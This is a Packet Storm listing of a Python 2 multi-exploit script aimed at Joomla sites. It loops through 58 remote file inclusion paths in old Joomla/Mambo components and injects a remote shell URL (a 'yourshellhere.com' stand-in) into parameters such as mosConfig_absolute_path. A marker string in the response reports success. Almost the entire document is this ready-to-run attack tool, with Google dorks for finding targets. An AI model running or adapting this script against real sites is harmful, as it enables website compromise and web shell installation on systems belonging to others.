This python script scans for 58 vulnerable Joomla component payloads.
26c1dd792718beea62e8eb0ab2d6c9e865e5fd26795e1320d27ddd6b697c5805#!/usr/bin/python
# Multi exploit para joomla by jolmos@buguroo.com
# Implements the 58 joomla exploits sumarized by Mr.aFiR_ on http://www.exploit-db.com/papers/13633/
import urllib2
import re
import sys
class Exploit:
def __init__(self,dork,url):
self.url = url
self.dork = dork
def run(self,target,rfishell):
xplt = self.url
xplt = xplt.replace('##',rfishell)
url = '%s%s' % (target,xplt)
try:
req = urllib2.urlopen(url)
data = req.read()
if data.find('o2ij3oiwudjf') == -1:
print "[ Failed ] %s" % url
return False
print "[ Exploited!! ] %s" % url
return True
except:
print "[ 404 ] %s" % url
return False
class MultiExploit:
def __init__(self):
self.exploits = []
self.rfishell = 'http://yourshellhere.com/shell.txt???'
self.load()
def load(self):
self.exploits.append(Exploit('inurl:"com_admin"','/administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=##'))
self.exploits.append(Exploit('inurl:index.php?option=com_simpleboard','/components/com_simpleboard/file_upload.php?sbp=##'))
self.exploits.append(Exploit('inurl:"com_hashcash"','/components/com_hashcash/server.php?mosConfig_absolute_path=##'))
self.exploits.append(Exploit('inurl:"com_htmlarea3_xtd-c"','/components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=##'))
self.exploits.append(Exploit('inurl:"com_sitemap"','/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=##'))
self.exploits.append(Exploit('inurl:"com_performs"','/components/com_performs/performs.php?mosConfig_absolute_path=##'))
self.exploits.append(Exploit('inurl:"com_forum"','/components/com_forum/download.php?phpbb_root_path=##'))
self.exploits.append(Exploit('inurl:"com_pccookbook"','/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=##'))
self.exploits.append(Exploit('inurl:index.php?option=com_extcalendar','/components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=##'))
self.exploits.append(Exploit('inurl:"minibb"','/components/minibb/index.php?absolute_path=##'))
self.exploits.append(Exploit('inurl:"com_smf"','/components/com_smf/smf.php?mosConfig_absolute_path=##'))
self.exploits.append(Exploit('inurl:"com_smf"','/modules/mod_calendar.php?absolute_path=##'))
self.exploits.append(Exploit('inurl:"com_pollxt"','/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=##'))
self.exploits.append(Exploit('inurl:"com_loudmounth"','/components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=##'))
self.exploits.append(Exploit('inurl:"com_videodb"','/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=##'))
self.exploits.append(Exploit('inurl:index.php?option=com_pcchess','/components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=##'))
self.exploits.append(Exploit('inurl:"com_multibanners"','/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=##'))
self.exploits.append(Exploit('inurl:"com_a6mambohelpdesk"','/administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=##'))
self.exploits.append(Exploit('inurl:"com_colophon"','/administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=##'))
self.exploits.append(Exploit('inurl:"com_mgm"','/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=##'))
self.exploits.append(Exploit('inurl:"com_mambatstaff"','/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=##'))
self.exploits.append(Exploit('inurl:"com_securityimages"','/components/com_securityimages/configinsert.php?mosConfig_absolute_path=##'))
self.exploits.append(Exploit('inurl:"com_securityimages"','/components/com_securityimages/lang.php?mosConfig_absolute_path=##'))
self.exploits.append(Exploit('inurl:"com_artlinks"','/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=##'))
self.exploits.append(Exploit('inurl:"com_galleria"','/components/com_galleria/galleria.html.php?mosConfig_absolute_path=##'))
self.exploits.append(Exploit('inurl:"com_akocomment"','/akocomments.php?mosConfig_absolute_path=##'))
self.exploits.append(Exploit('inurl:"com_cropimage"','/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=##'))
self.exploits.append(Exploit('inurl:"com_kochsuite"','/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=##'))
self.exploits.append(Exploit('inurl:"com_comprofiler"','/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=##'))
self.exploits.append(Exploit('inurl:"com_zoom"','/components/com_zoom/classes/fs_unix.php?mosConfig_absolute_path=##'))
self.exploits.append(Exploit('inurl:"com_zoom"','/components/com_zoom/includes/database.php?mosConfig_absolute_path=##'))
self.exploits.append(Exploit('inurl:"com_serverstat"','/administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=##'))
self.exploits.append(Exploit('inurl:"com_fm"','/components/com_fm/fm.install.php?lm_absolute_path=##'))
self.exploits.append(Exploit('inurl:com_mambelfish','/administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=##'))
self.exploits.append(Exploit('inurl:com_lmo','/components/com_lmo/lmo.php?mosConfig_absolute_path=##'))
self.exploits.append(Exploit('inurl:com_linkdirectory','/components/com_lmo/lmo.php?mosConfig_absolute_path=##'))
self.exploits.append(Exploit('inurl:com_linkdirectory','/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=##'))
self.exploits.append(Exploit('inurl:com_mtree','/components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=##'))
self.exploits.append(Exploit('inurl:com_jim','/administrator/components/com_jim/install.jim.php?mosConfig_absolute_path=##'))
self.exploits.append(Exploit('inurl:com_webring','/administrator/components/com_webring/admin.webring.docs.php?component_dir=##'))
self.exploits.append(Exploit('inurl:com_remository','/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path='))
self.exploits.append(Exploit('inurl:com_babackup','/administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=##'))
self.exploits.append(Exploit('inurl:com_lurm_constructor','/administrator/components/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=##'))
self.exploits.append(Exploit('inurl:com_mambowiki','/components/com_mambowiki/MamboLogin.php?IP=##'))
self.exploits.append(Exploit('inurl:com_a6mambocredits','/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=##'))
self.exploits.append(Exploit('inurl:com_phpshop','/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=##'))
self.exploits.append(Exploit('inurl:com_cpg','/components/com_cpg/cpg.php?mosConfig_absolute_path=##'))
self.exploits.append(Exploit('inurl:com_moodle','/components/com_moodle/moodle.php?mosConfig_absolute_path=##'))
self.exploits.append(Exploit('inurl:com_extended_registration','/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=##'))
self.exploits.append(Exploit('inurl:com_mospray','/components/com_mospray/scripts/admin.php?basedir=##'))
self.exploits.append(Exploit('inurl:com_bayesiannaivefilter','/administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=##'))
self.exploits.append(Exploit('inurl:com_uhp','/administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=##'))
self.exploits.append(Exploit('inurl:com_peoplebook','/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=##'))
self.exploits.append(Exploit('inurl:com_mmp','/administrator/components/com_mmp/help.mmp.php?mosConfig_absolute_path=##'))
self.exploits.append(Exploit('inurl:com_reporter','/components/com_reporter/processor/reporter.sql.php?mosConfig_absolute_path=##'))
self.exploits.append(Exploit('inurl:com_madeira','/components/com_madeira/img.php?url=##'))
self.exploits.append(Exploit('inurl:com_jd-wiki','/components/com_jd-wiki/lib/tpl/default/main.php?mosConfig_absolute_path=##'))
self.exploits.append(Exploit('inurl:com_bsq_sitestats','/components/com_bsq_sitestats/external/rssfeed.php?baseDir=##'))
self.exploits.append(Exploit('inurl:com_bsq_sitestats','/com_bsq_sitestats/external/rssfeed.php?baseDir=##'))
def launch(self,target):
for xplt in self.exploits:
if xplt.run(target,self.rfishell):
return
if __name__ == '__main__':
if (len(sys.argv) != 2):
print 'usage: %s http://vulnerable.com/joomla/'
sys.exit(1)
me = MultiExploit()
me.launch(sys.argv[1])
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed